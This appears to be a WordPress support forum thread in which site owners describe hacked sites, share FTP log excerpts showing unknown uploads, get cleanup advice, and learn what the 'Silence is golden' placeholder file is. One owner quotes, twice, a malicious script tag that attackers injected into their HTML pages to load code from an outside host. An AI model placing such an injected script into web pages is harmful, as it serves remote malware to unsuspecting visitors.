All my websites hacked ‘silence is golden’?

Ahhh! Thanks, that explains why the ez-painting site was blank.

It seems like the hackers have got into my html files and inserted scripts hosted at https://ez-paintinginc.com so the problem is bigger than I thought. I’ve deleted some of my websites, but I haven’t replaced them with new sites yet or restored wordpress. Getting there slowly

There is seems to be major hacking over a wide range of WP blogs. I think theres something the WP guys arent telling us. A bit of info wouldnt go astray…

neo721x: All the changes between releases are listed in the change logs. See if you can find any security updates between 1.8.4 and 1.8.5 and you’ll have an idea if there were any security issues they were aware of and fixed.

As to hacking, it is becoming more common all over the place, not just with WordPress. These hacks are happening everywhere. Go check out Joomla, or any other php/database-driven software. Hackers are always finding new ways to hack websites.

Someone told me there is a way I can find the IP address of the hacker and block it. Anyone know how? And is it worth doing it? I figure they probably have rotating IP addresses anyway.

This keeps finding its way onto my html pages
<script src=https://ez-paintinginc.com/lindy/index.php ></script>

I hope visitors to my site aren’t getting some sort of trojan or something happening to their computers.

I found a log file for https://ftp.mydomain.com

It says it has been accessed by IP 216.97.230.50 which whois shows as being hosting company LunarPages. They are not my hosting company so there is no reason why anyone from there should be accessing my ftp account

OrgName: Lunar Pages
OrgID: ACIDL
Address: 100 East La Habra Blvd.
City: La Habra
StateProv: CA
PostalCode: 90631
Country: US

Here is a sample from the log

Fri Oct 23 15:50:34 2009 0 216.97.230.50 2029 /home2/mydomain/public_html/folder/wp-content/plugins/hello.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 5663 /home2/mydomain/public_html/folder/wp-content/plugins/sidebarLogin.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 30316 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 30401 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1

Could this be my hacker and is it safe to ban that IP? Any help appreciated

Thanks ??

P.S. The strange thing is that I’ve been in on the ftp account but my IP address doesn’t show in the log

If you don’t know the IP address, I’d say to block it as you can always remove it later if needs be, though I don’t think the blocking tools you have will be enough to keep them out of FTP if they are getting in with proper authentication methods. I’d suggest changing your password for cPanel, your blogs, your email addresses, and anything else you have which has a password. Also, look over some of the following:
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://helpdesk.bluehost.com/index.php/kb/article/000511

Thanks

I did block the IP but this morning I found no evidence anyone had been in the ftp account according to the access logs but this

<script src=https://ez-paintinginc.com/lindy/index.php ></script>

has been inserted back into the html file

I don’t really understand a lot of the technical stuff. i’m just doing what I can until my tech person is available to work on it. Hopefully she’ll know how to set up the .htaccess file and other things to help protect my site

I just downloaded a brand new copy of 2.9.2 and the plugins dir had a index.php file in it with nothing more than
<?php
// Silence is golden.
?>

What is that about?

as additional info on this:

I did wonder also and was quite worried – but this seem to be a securityfile.(just the <?php // Silence is golden. ?> line)

see: https://www.shinephp.com/silence-is-golden/

“Is your new WordPress plugin secure? Did you see the small 30 byte size only index.php file in such WordPress folders as wp-content, wp-content/themes? It is placed there by WordPress developers for the security reason. The explanation is obvious: if somebody input in his browser the URL like
https://www.yourblog.com/wp-content/plugins/
he could not see the full folder content, its subfolders and files list.”

there seem to be a plugin for to manage this:

https://www.shinephp.com/silence-is-golden-guard-wordpress-plugin/
Silence is Golden Guard WordPress plugin

I have not checked this info but it seems to be logical…
as for myself I′ve also put a idex.html file in the plugin-directory.

regards

m